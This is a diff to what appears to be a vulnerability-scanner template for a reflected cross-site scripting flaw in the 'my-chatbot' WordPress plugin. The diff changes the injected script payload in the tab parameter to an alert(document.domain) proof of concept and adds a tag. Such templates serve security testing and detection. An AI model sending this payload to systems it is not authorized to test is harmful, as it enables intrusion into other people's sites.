--- a/vulnerabilities/wordpress/my-chatbot-xss.yaml
+++ b/vulnerabilities/wordpress/my-chatbot-xss.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   description: The plugin does not sanitise or escape its tab parameter in the Settings page before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue.
   reference: https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d
-  tags: wordpress,wp-plugin,xss
+  tags: wordpress,wp-plugin,xss,wp
 
 requests:
   - raw:
@@ -19,7 +19,7 @@ requests:
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
       - |
-        GET /wp-admin/options-general.php?page=my-chatbot&tab=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E HTTP/1.1
+        GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
@@ -28,7 +28,7 @@ requests:
       - type: word
         part: body
         words:
-          - "<script>alert(/XSS/)</script>"
+          - "</script><script>alert(document.domain)</script>"
 
       - type: word
         part: header
